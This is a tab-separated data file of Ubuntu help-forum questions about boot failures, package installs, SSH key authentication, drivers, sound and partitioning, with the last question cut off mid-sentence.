394377	ubuntu installation along windows 7 and also installing alone	i have sony vaio e series laptop 64-bit architecture which was in windows 8 in uefi mode . i install ubuntu 13.10 desktop-amd 64 but there was booting problem i followed one of your tutorial and fix that problem . mistakenly i uninstall ubuntu from live usb and when i restart my pc this option appear operating system not found . i did my best but neither i recovered my win 8 nor ubuntu . i switched to legacy mode and install windows 7 . through wubi i tried to install ubuntu 12.04 but when i restart my pc and it goes to ubuntu installation it shows some error like partition boot type . when i try to install ubuntu from live usb it shows me that you have no operating system erase disk and install ubuntu and something else . when i click something else it shows me that all of my hard disk is free . i create partition in it on of 40 gb mount / , another of 50 gb mount /home , the third one 2 gb for swap area and 10 mb for /bios/boot something like that . i install ubuntu and after installation is complete i restart my pc and then it show me again operating system not found . how to resolve this ? ? ? ? ? ? ? ?
394378	undo fixing of broken dependencies and updates	i wanted to install screen and after command sudo apt-get install screen i got error and information that i should command apt-get install -f. so i executed : sudo apt-get update sudo apt-get install -f sudo apt-get update sudo apt-get upgrade sudo apt-get install screen it was fine and screen worked . after reboot ubuntu hangs . any one of tty does not work and i only see bliding dash . if i booting to recovery mode and command shutdown now in root command prompt then ubuntu transits to tty1 and tty1-6 works properly , but tty7 has only blinking dash . i suspect that updates or fixing of broken dependencies case this problem . is there some way to recover state before that ?
394380	dumb power setting ensure dim screen all the time	it 's quite dim , but when i unplug , it gets brighter . funnily enough , when the battery gets critical it goes dim again , and if i plug it in in a dim state it finally gets bright with the power plug inside . power settings do n't help nor can i find any brightness control ( is there any hidden somewhere ? )
394384	recover data from an ancient hdd and check for bad sectors	i just found an ancient external hard drive with a whopping 10 gb of data and i was wondering if there is a way to check the health of the disk ( since it apparently did n't have a partition table what is a bit odd on it 's own ) . the usb device is n't supported by smartmontools ( which is a bit obvious but one can only hope that things will be easy for once ) i tried to recover some old files that the past me left for me to discover 13 years later but i was unsuccessful using testdisk . is there anyway to check for bad sectors and perhaps recover some files from this time-capsule of data ?
394385	why ca n't i install gwget ?	tried installing it from command line ( sudo apt-get install gwget ) and i get this : reading package lists ... done building dependency tree reading state information ... done package gwget is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gwget ' has no installation candidate what does it mean ? i 'm using ubuntu 13.10
394386	wubi is only installing ubuntu & not ubuntu genome	i 've downloaded full image of ubuntu genome 13.04 & extracted it to my laptop . now whenver i am booting it using usb it is very well working but whenever i tried to install it using wupbi it is only & only showing me ubuntu ... kubuntu ..options & not genome one & even if i slect ubuntu option , it start to download meta data . any idea why it is happening..why genome is not installing .
394387	ca n't install .sh file	ok , i know there are over 100 questions on this forum just like this one , i know because i 've read every one of them , with no luck . i have downloaded a .bin file , extracted the contents into a folder . which gives me a .sh file to install . i have : made sure it was executable both in dolphin , and the file properties itself tried sudo chmod 777 filename.sh sudo chmod +x filename.sh tried to run it in terminal by typing in : sh ./filename.sh source ~./filename.sh /bin/bash/filename.sh source ./filename.sh sudo ./filename.sh ! /bin/bash/filename.sh sudo bash/ filename.sh and some more , on another terminal window i 've closed , so i do n't remember what all it was . this is a driver for my belkin router , so i can utilize the usb ports on the router , which i need for my home network . no matter what i do , i either get an error of some type , or it just returns , but never installs . as you can see i 've spent a lot of time on this , trying every possible way i could find , i even downloaded the dh-make software from the repository , which is supposed to make files executable , did n't work . so what am i doing wrong ? is there another way i can try , i really need to get this installed . normally i wo n't download anything from the internet , if i ca n't get it in a repository , i do without . however i got this from belkin , a major company so i feel i can trust it . please help . edit : ok , there was no output of any of the things i tried , i typed in the command , hit enter , and instantly had another prompt . that was it . the result of the `` head -n1 '' command , was # ! bin bash . here is the address where i downloaded the file download belkin f9k1103 router firmware 1.00.42 for linux btw . just wanted to say , i do n't know what happened on my formatting , but the edits that were made was the way i originally put it in . i do n't know why it jumbled into one paragraph like that . thank you to whoever corrected it , it just bugs me it did n't keep the formatting i put in .
394390	how do i revert back to windows vista from ubuntu 12.10 on a packard bell laptop	i bought the laptop on ebay and i dont have any discs for ubuntu or windows vista . the stickers on the laptop indicate the factory settings as having vista installed . pressing alt and f10 at startup to go into restore doesnt do anything .
394391	bring windows xp to the last option instead of first option	is there any way to install xp after installing lubuntu 13.10 and bringing ubuntu to the first position in the grub menu as i am using xp only for my school work and i am using ubuntu for all my work . if , there is a way , then i want a detailed answer as i am using linux for the first time .
394395	how can i find out what the settings in /sys/bus/usb/devices/ < id > /power mean ?	i am trying to hammer out an issue with one of my usb hard drives constantly falling asleep and waking back up . i made my way into /sys/bus/usb/devices/3-4/power .. inside are a number of settings : me @ mybox : /sys/bus/usb/devices/3-4/power $ dir active_duration control runtime_status autosuspend level runtime_suspended_time autosuspend_delay_ms persist connected_duration runtime_active_time each is a file with a setting in it.. but there is no description of what the settings mean . for example , if i open autosuspend in nano , the only thing inside it is 2 .. nothing else . how can i find out what 2 means , and what the other possible values are ? thanks
394397	how to increase unitys search timeout ?	my laptop is not the fastest , especially when i 'm running low on memory . this makes unity timing out to soon when i try to start an application , for example . it just displays no results . how can i increase the timeout ?
394398	how to find and install divers for a canon ip4300 printer	i would like to install my canon ip4300 printer onto the latest version of ubuntu . i think i have found some unsupported drivers provided by canon , but do not know how to install them . if anyone knows of any supported drivers , and how to install them i would be very grateful . thankyou .
394399	ca n't log into ubuntu 13.10 , tried unity , cinnamon and gnome session	i try to log in on the normal log in screen and the screen goes black for a second and then kicks me back to the log in screen . i can log in with a guest session just fine , however . i 've tried this with unity , cinnamon and good old fashion gnome , and the same thing happens with all three . i 've looked through the log files , but none of them seem to have anything related to this problem . right now , cinnamon and unity have been completely removed from the system .
394402	i do n't know how to install binary drivers	i have a hp 625 laptop , a ati radeon hd 4250 video card and ubuntu 12.04 lts . at https : //help.ubuntu.com/community/binarydriverhowto/ati it says : `` the easiest way to install binary drivers is to use the built in additional drivers manager in ubuntu . '' can someone please explain to me how to actually do that ( in newbie language ) ? i have downloaded and extracted the binary driver , but i do n't know how to proceed . when i go to the additional drivers manager it only shows my wlan driver . thank you very much in advance : )
394403	multiple ssh keys on home computer	i would like to be able to use ssh key to log into my web server via ssh and disable password authentication completely ( to eliminate brute force from malicious ip addresses ) . so i am reading the documentation : https : //help.ubuntu.com/community/ssh/openssh/keys now it instructs to do the following : mkdir ~/.ssh chmod 700 ~/.ssh ssh-keygen -t rsa here 's the problem with running ssh-keygen . i already did that in order to generate keys to connect to my github account . so my .ssh directory already looks like this : ~/.ssh $ ls -l total 16 -rw -- -- -- - 1 viggy viggy 1766 sep 5 20:36 id_rsa -rw-r -- r -- 1 viggy viggy 403 sep 5 20:36 id_rsa.pub -rw-r -- r -- 1 viggy viggy 4422 dec 22 11:45 known_hosts will running that command again overwrite the id_rsa files ? is there a better way to store both keys ? my ultimate goal here is to not overwrite my git keys , yet generate a ssh public and private key so that i can copy the public key to ~/.ssh/authorized_keys on my web server .
394405	sound issue with my hdmi port	i have the strangest issue with my hdmi sound output right now . i 'm trying to get ( obviously all ) audio output to go to my tv . i do n't know how the explicit issue is relevant , but i can get movie player to output sound in my tv 's speakers via the hdmi cable , but i -- ca n't -- get my gameboy color emulator to output the sound to my hdmi ; instead , it outputs noise in my computer , which is very annoying because i can only control the volume of the hdmi output via my computer . any ideas ? feel free to ask questions for more details if you 're willing to help .
394411	juju status is - conflict 409 . what should i do ?	i have 3 computers . on the first i have installed maas with dhcp and dns , the other two are ready in the web interface . after i use juju bootstrap one of them is turning blue and the other is still green . when i deploy juju gui the two nodes are blue . the juju gui is working without a problem . after that i want to deploy other things with the juju gui but they are not deployed , just pending . when there is no ready node the message in the juju status is - conflict 409 . what should i do so that i can deploy other services without adding another and another computer .
394416	new hard drive access	i 'm a ubuntu noob so please bare with me . i do have 30 years of msdos/windows experience so i 'm not a babe in the woods computer guy . my question is : i have ubuntu 13.10 ( 64bit ) installed on a dell desktop with 2 gb of memory . it shares a hdd with windows 7 . i recently installed an additional 1tb drive . i have been trying for days to make the second hard drive readable from another windows xp machine over my network without success . the second drive is formatted to ext3.. i figured i would try to expand the home directory which is readable from the xp machine . my goal is to use ubuntu as a movie and music server . also , i am trying to move away from microsoft as i have already installed programs that do the same thing i can do on my xp machine . thank you for your time and help .
394422	how to make files executable on vfat partition	i 'm using 12.04 and have a shared vfat partition on which i keep my documents . lately i 'm trying to run one of my own executables , but the terminal keeps telling me i have no permission to do so . i 've tried changing things in fstab , but without succes , and using chmod on the file has proven useless . currently my fstab line on the drive looks like this : uuid=66c6-bd70 /mnt/share vfat defaults , user , exec , auto , umask=007 , fmask=0111 , dmask=0000 , uid=1000 , gid=1000 0 0 can anyone help me with this ?
394424	cant see my garbage	hi guys i 've a problem with my system because i cant see my garbage every time i delete someting would really appreciate if you guys could help me out . cheerz
394427	enable backported and unstable repositories	how can i enable backported and unstable repositories under ubuntu 13.10 from the terminal ? i tried to enable them using this solution but it works for backported only and when i opened /etc/apt/sources.list i found it empty !
394434	create shortcut for enable second display	is way to create shortcut ( keyboard or desktop or best put to top menu ) for enable/disable secondary display and change sound output ? i have tv as second display connected via hdmi . when is tv off i need disable second display in system settings and also change audio output from hdmi to analog output . thanks
394435	`` operating system not found `` after installing ubuntu 13.04	i successful installed ubuntu 13.04 on my laptop with usb key . but after i reboot i get this error `` operating system not found '' i used boot-repair and it gives me this : http : //paste.ubuntu.com/6618963/ i think i probably messed up with the partitioning . can anyone give me some help ?
394436	starting up and log in	when i start up our computer ( where you put in your password ) i know have a split screen . think my daughter did something ! ! once you have logged in it goes back to a normal screen . how can i get rid of this split screen when i 1st . turn on our p.c . you also can not type in the numbers u have to use the keyboard that pops up on the right side with the mouse . u can not type in the numbers ? please help i have no clue what to do ! !
394443	font rendering problem in kde	kubuntu noob user here . i feel like i messed something with the font configuration but i 'm not sure why . now i see ugly fonts in all application . any idea to restart the font rendering like it was ?
394445	ubuntu 13.10 broken login-box on login-screen	i am new to ubuntu so please be gentle . i upgraded my ubuntu 12.04 to 13.10 a few days ago . everything was ok , i set it up according to my ideas and it worked as i wanted . today , i worked under windows and then i rebooted to ubuntu and the problem came up ( i have changed something , so i am not sure whether it has caused the problem or not ) . the login-screen displayed correctly but there was no input box for log in . i pressed arrow keys and the input box for remote login appeared , but no other . i tried to reinstall greeter or lightdm , but i do n't understand theese things very well .
394446	problems downloading updates for 12.04	i ca n't get all my updates for ubuntu 12.04 because i get 404 's for four of them . failed to download files or could not fetch from canonical archives something about network connection problems maybe ? but my wi-fi network connection seems fine . now i 'm getting the little red triangle with the exclamation mark in the middle . what to do ?
394449	each time i boot the system it start `` scanning disk for errors ''	my system is scanning the disk for errors every time i boot the system , so i have to wait until it completes or press c to cancel it . the system operates normally afterwards but i would like to stop the filesystem check at every boot . how do i do this ?
394452	chrome unstable on ubuntu 13.10	i have been using google chrome for a long time on windows without ever encountering frequent crashes . but whenever i use chrome on ubuntu 13.10 , the pages crash very often . either the enter application freezes or a tab generates the ever annoying `` aw snap ! '' message . i tried following instructions to remedy the problem but it just keeps recurring . is there a solution ?
394453	how to write to sd card	i heard of people saying they could if they did it as a root user . how do i do that . when i tried to write to sd card . . . i got a read only error . permissions says owner : me access : create and delete files group : disk access : none ( cant change it ... get a permission error ) other access : none ( same error ) oh yea i have ubuntu 13.10
394454	trying to increase ubuntu 's partition size and decrease os x partition size ?	my partitions look like this right now : i can re-size the os x partition easily enough , but then i have trouble trying to move the ubuntu partition over , since there 's a partition in the way ( /dev/sda3 ) is there any way i can do this ? or would i have to re-install ubuntu after re-sizing the os x partition ?
394455	how to have pinch to zoom gesture with a laptop touchpad ?	i have asus laptop with a 2 touchpad which has 2 fingers multitouch capabilities . how can i activate the pinch to zoom gesture ? ( it was sell with windows 8 with i can do that ) . i 'm under ubuntu 12.04.3 maybe with the new release ?
394456	my system boots directly into windows 8 and i ca n't see the grub	i installed ubuntu from a bootable dvd , created the partition using the installer and went through all the necessary steps but when i restarted , the computer went directly into windows 8 . is there something simple that i 'm doing wrong ? like holding down a certain key when restarting ?
394458	how to prevent output volume popping back to 100 %	the output volume in ubuntu normally can go up to 100 % unamplified . it is possible to go beyond this to amplified levels using settings in the interface of gnome-control-center sound . however , when a standard volume control on a keyboard or headset is used , the volume pops back down from the amplified region - making the amplified region inaccessible by these normal controls . so , for example , let 's say i have the following settings : in this configuration , if i now select the volume up option on my headset , the volume decreases to the 100 % level . this is counter-intuitive for me . how can i prevent this behaviour from occurring ? i would like to have this full range accessible to me using the normal controls on my keyboard , headset etc . thanks for any ideas !
394459	does deleting a file from my computer also delete it from ubuntu one ?	if i delete from my computer something , will that be deleted from my ubuntu one cloud ? if not , then how can i delete it ? i 'm new here and i 'm confused how all this works ...
394468	grub wo n't load unless i go into bios first	currently using 64bit version of 12.04 lts . uefi turned off ( set to legacy ) ; secure boot disabled and fast boot ( in win8 ) turned off and boot speed set to normal . changing ahci to ide does n't make a difference . also installing only ubuntu on hd has same issue ( i have to f2 into bios before system will boot straight into ubuntu . ) if i boot normally i get the toshiba splash screen and then nothing - just a blank screen . if i boot and f2 into bios and then either `` save '' or `` not save '' , then system will restart ( toshiba splash screen again ) and then i get grub and can boot into either ubuntu or win8 . i have tried just about every combination of bios settings possible . i can say that it most definitely does not like uefi , and i 'm okay with that . currently boot-repair shows this : http : //paste.ubuntu.com/6619206/ any ideas on why going into bios settings first causes grub to load properly ?
394470	will be trim enabled by default ?	i heard that ubuntu 14.04 will feature trim by default on ssds . what i would like to know is that if in the current daily builds it is already activated . also , it would be appreciated a way to verify if it is indeed working .
394471	can not deploy juju charm	hello i get the following message status info : hook failed : `` shared-db-relation-changed '' i get it on glance , cinder and quantum . what does it mean ? thanks
394478	why my cpu of 2.1ghz clocks at 800mhz in ubuntu 13.10 ?	i 've a problem with my notebook dell inspiron 1720 . this notebook have a cpu intel t8100 2.1ghz and it does n't work perfectly . it works at 800mhz stable , like in power-safe . but when i change the performance mode , the cpu remains at 800mhz . now the pc is very slow .
394480	having problem with ram	first of all please excuse my english . before im using ubuntu 12.04 32-bit , i 'd used windows 7 and also using virtualbox to run linux . with virtualbox , i spent 1 gb of ram and forgot to claimed back the ram from virtualbox then i install ubuntu 12.04 over windows 7 . as for now , ubuntu only detect 2.7 gb of ram instead 4 gb . how do i get 4 gb as default ram ?
394482	how to go back in explorer manager ?	i am new in ubuntu and i do not find how to `` go back '' at the previus view while i am travelling in the folders . is there a keyboard shortcut for this action ? ( in windows i can use `` left arrow '' to do this )
394484	a quick question about task manager	in task manager it says that a command named python is using 16777216 terrabytes of virtual memory . i 'm a little hazy about what vm is , but i 'm pretty sure this is n't supposed to happen . i was n't sure where to ask this , but since i am using ubuntu i 'll post it here . could this be a glitch ?
394485	ubuntu install after windows wipe	so my mom 's computer was so overrun with viruses and spyware/malware etc . that i told her the best thing to do was to wipe the system and start over . i ran the recovery program from bios and found after it wiped the hard drive that it had no partition for recovery . i decided the next best thing to buying new $ 200 software was to install ubuntu since she only uses the computer for email and internet surfing . i downloaded the ubuntu .iso file and burned it to a dvd . i booted the computer from the disc and chose the option to erase the current os and install ubuntu over it . every time i try to run the installer it crashes . it keeps telling me that there may be something wrong with the hard disk but i 'm not sure what . it 's a new computer , not even a year old . is there something else i should do to try and install ubuntu ? i 'm new to this so any suggestions would be extremely helpful .
394486	installation on raid 6i array ?	i 've been trying to get some linux distro - any linux distro - to function on an hp dl380 g4 . i have an array of six 36gb scsi320-sca drives on the onboard hp smartarray 6i controler ; not a single thing i 've tried thus far ( ubuntu , fedora , debian , porteus , zorin ... ) has detected any logical volumes to install to . i went to hp 's website and looked into an .rpm driver , and found that i was expected to `` copy the file to my hard drive and install it from there '' - really ? i have to put the disk driver on to the disk so i can use that disk in the first place ? i 'm really getting tired of this and might just put win2k on it and be done . how exactly do i go about installing linux from a cd onto this raid array ? much appreciated .
394488	i logged into my system but unity does n't seem to come up . maybe it has crashed	i have a problem , because it looks like unity has crashed . today i logged into my system , but the panel and the launcher do n't came up . i only see my files that i stored on the desktop . please help me , because i do n't want to lose my data .
394489	mouse problems with ubuntu	i am a new user to the ubuntu for a home pc ( i have used the server software and putty ) . so first i will explain my problem and tell you what my specs and mouse is . my problem is that say i have firefox open , i can not click outside of firefox and i can not even click the close button , but when running windows i get no problems , this is a new pc i have tried updating and upgrading - no harm in trying again . ubuntu 13.10 amd fx-4100 quad core 3.6ghz - 4gb ram - 1tb hdd - cyborg mad catz r.a.t3 - cyborg v.5 keyboard - asus m578al-m lx v2 ( motherboard ) thanks , all help appreciated . i love ubuntu and want to keep using it but this is a major problem .
394494	delay pressing volume or screen bright buttons	i have a asus ns53 , running the last version of lubuntu right now , 13.10 . all the keys works fine , but when i press the volume buttons , or screen buttons , there is a random delay of 1 second ( for example , i press , it tooks 1second . if i press continously , it does nothing in 1 second , afterwards apply without delay the increment/decrement ) . with the screen bright button occurs the same . may be is related with the demon who catch the keys ? it must not be de % cpu , is about 3 % , and the system has 16gb .
394496	ssh key authentication still prompts password	i got ssh key authentication working on my production server quite swiftly . however , i have been struggling to get it to work on my development server . first , i generated the keys ( i use ubuntu on both home and server ) : $ ssh-keygen -t rsa -f ~/.ssh/production-key.id_rsa .ssh $ ls -l total 36 -rw-rw-r -- 1 viggy viggy 234 dec 22 15:21 config -rw -- -- -- - 1 viggy viggy 1766 dec 22 15:03 development-key.id_rsa -rw-r -- r -- 1 viggy viggy 397 dec 22 15:03 development-key.id_rsa.pub -rw -- -- -- - 1 viggy viggy 1766 dec 22 13:12 production-key.id_rsa -rw-r -- r -- 1 viggy viggy 397 dec 22 13:12 production-key.id_rsa.pub -rw -- -- -- - 1 viggy viggy 1766 sep 5 20:36 id_rsa -rw-r -- r -- 1 viggy viggy 403 sep 5 20:36 id_rsa.pub -rw-r -- r -- 1 viggy viggy 4422 dec 22 11:45 known_hosts i added development private key to my config file : vim config host production hostname xx.xxx.xx.xxx user myuser identityfile ~/.ssh/production-key.id_rsa host development hostname xx.xxx.xx.xxx user myuser identityfile ~/.ssh/development-key.id_rsa then i copied public key to server : cd ~/.ssh vim authorized_keys // deleted contents of this file and copied my development-key.id_rsa.pub into it and saved file cat authorized_keys // looked at contents to confirm it matched my development-key.id_rsa.pub then i tried to ssh into development server , but it asked for my password ( rather than prompting for passphrase ) . so next i began to troubleshoot why it did n't work . i checked the file/directory permissions on server : $ ls -l | grep home drwxr-xr-x 6 root root 4096 aug 7 2012 home $ ls -l | grep myuser drwxr-xr-x 16 myuser myuser 4096 dec 22 17:47 myuser $ ls -la | grep .ssh drwx -- -- -- 3 myuser myuser 4096 dec 22 15:32 .ssh ~/.ssh $ ls -l | grep authorized_keys -rw -- -- -- - 1 myuser myuser 396 dec 22 15:32 authorized_keys next i looked at the sshd_config file to confirm its configurations . now i do not have password authentication disabled yet , but i do n't have it disabled on my other server either and the ssh keys worked : $ cd /etc/ssh $ head -n 1000 sshd_config | grep 'passwordauthentication' # passwordauthentication yes i checked to see if any accounts were not allowed access to ssh ( but there was nothing unusual here ) : $ head -n 1000 sshd_config | grep 'allowusers' $ head -n 1000 sshd_config | grep 'denyusers' i made sure public key authentication was enabled : head -n 1000 sshd_config | grep 'pubkeyauthentication' pubkeyauthentication yes $ head -n 1000 sshd_config | grep 'rsaauthentication' rsaauthentication yes rhostsrsaauthentication no i then restarted the ssh server : sudo restart ssh i then checked if my home directory is encrypted but it 's not : ls -a /home .directory lost+found quota.group someuser myuser passenger quota.user i checked perhaps there was some other configuration on the system : / $ locate sshd_config /etc/ssh/sshd_config /usr/share/doc/openssh-client/examples/sshd_config /usr/share/man/man5/sshd_config.5.gz i tried the suggestions here : ssh no longer allows public key authentication so finally i tried ssh in debug mode , and this is what i got ( i changed the ip address and usernames ) : ssh -vv myuser @ xx.xxx.xx.xxx openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /home/viggy/.ssh/config debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to xx.xxx.xx.xxx [ xx.xxx.xx.xxx ] port 22. debug1 : connection established . debug1 : identity file /home/viggy/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/viggy/.ssh/id_rsa-cert type -1 debug1 : identity file /home/viggy/.ssh/id_dsa type -1 debug1 : identity file /home/viggy/.ssh/id_dsa-cert type -1 debug1 : identity file /home/viggy/.ssh/id_ecdsa type -1 debug1 : identity file /home/viggy/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.1 debug2 : fd 3 setting o_nonblock debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-rsa , ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : rsa 42 : f0:18 : ae : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx debug1 : host 'xx.xxx.xx.xxx ' is known and matches the rsa host key . debug1 : found key in /home/viggy/.ssh/known_hosts:3 debug1 : ssh_rsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/viggy/.ssh/id_rsa ( 0xb8bab790 ) debug2 : key : viggy @ teamviggy ( 0xb8bb1e18 ) debug2 : key : viggy @ teamviggy ( 0xb8bb1cb8 ) debug2 : key : /home/viggy/.ssh/id_dsa ( ( nil ) ) debug2 : key : /home/viggy/.ssh/id_ecdsa ( ( nil ) ) debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/viggy/.ssh/id_rsa debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : offering rsa public key : viggy @ teamviggy debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : offering rsa public key : viggy @ teamviggy debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/viggy/.ssh/id_dsa debug1 : trying private key : /home/viggy/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug1 : next authentication method : password myuser @ xx.xxx.xx.xxx 's password : update : so i used my public production key on my development server and that worked . so apparently something in my ~/.ssh/config file is incorrect but i am not sure what .
394499	how to fix ubuntu booting to a command line after an update ?	i have been running ubuntu 12.04 off of a hp pavilion dv2000 for a while now , probably about a year or so . i 've not had many issues other than not being able to properly install a graphics driver on it which did n't really bother me too much . but i had n't used id in a while and today after turning it on it wanted to update , so i let is . to finish the updates it wanted to restart , which i did , but when it came back on it only booted to command line . i was n't sure what was going on so i restarted a few times and go the same thing although it will briefly flash the ubuntu start up screen . i 've looked around some to see if i can figure out what is going on and it looks like it might be something with the graphics . but everything i 've looked at seems to involve deleting or re-configureing the graphics driver and sense i never managed to get one working properly i do n't know what i can do save maybe try to reinstall . how do i fix this issue ?
394501	how to extract xubuntu live dvd styles , icons , fonts and install them on an existing ubuntu installation with xfce	i would like to know how to do this when i have no internet ? the only internet i have right now is if i take my android tablet to a place near where i live that has free wifi . i would like the answer to be very detailed and in steps explaining all and everything that needs to be done , with nothing left out since i 'm a linux noob when it comes to doing most things that require code or adding files to an existing installation of linux .
394502	set a lower p-state for my cpu ( underclocking )	in windows 8 you can set a max/min cpu speed percentage allowing you to use your cpu at a lower or higher p-state . for example , my cpu has a default speed of 2.3ghz ( turbo 3.2ghz ) , however using the max/min settings i can underclock it to a stable 1.36ghz ( which appears to be the lowest supported setting on my cpu ? ) . how can i do this under ubuntu 13.10 ? i would prefer a non-terminal command method if possible .
394503	how do i enable system sounds for 13.10 ?	i just upgraded from 10.10 to 13.10 with the new unity look , and the sounds start-up and shut-down sounds do n't play any more , but i can see them in the folder . why is this and how do i enable them again ? thanks in advance .
394504	remote desktop connection ipv6	i am working at ubuntu 12.04 64bit . i have installed gnome-desktop and xrdp . everything seems to be right but when im trying to connect by remote desktop connection in windows 7 i can see this error picture : i dont know why . i am connecting by ipv6 because in vps.me free users have n't no dedicated ipv4 only a shared but i ca n't connect anyway by shared i am totaly unskilled . thats why i really need help tp set it up . how to fix this ?
394505	login screen wallpaper is not working in ubuntu	i played with ubuntu tweak tool to change my login screen background but i could't use custom pictures.to use my pictures i changed permission to usr/share/backgrounds folder . i search wikipedia and used every chmod command.at last i was able to copy my pictures to backgrounds folder.but now my login screen wallpaper does not appear.i tried setting default wallpaper but it also did n't work.is there any way to restore default settings and get the wallpaper back on login screen ?
394508	fglrx freeze upon lockscreen or lid close when igpu selected	my system has hybrid ( and i believe muxless , i.e . only the integrated card is actually connected to the display ) graphics . the first card is an intel hd 4400 , and the second card is the amd radeon hd 8670m ( solar system series , not oland ) . thus , currently the open-source radeon driver does not support the card , and i am forced to use the proprietary fglrx driver . why not just turn the dgpu card off without fglrx ? i have no need of fancy graphics and would be happy to simply turn the discrete ati card off , so long as it was properly switched off and was not overheating/eating battery . the options to do this without fglrx and pxpress seemed limited to me : i have no vgaswitcheroo switch ( even before fglrx was ever installed ) and i can only deduce this was because the radeon driver does not yet support my card/does not properly load it yet , see my question here for more on that and the things i tried . other methods like acpi_call have been reported as at best `` proof of concept '' and at worst dangerous , so i 'd rather not venture into using them . more reliable projects like bumbleebee are nividia only . simply leave the amd card driverless relying on just the i915 intel driver works flawlessly , no bugs , no problems , however the amd card is then left 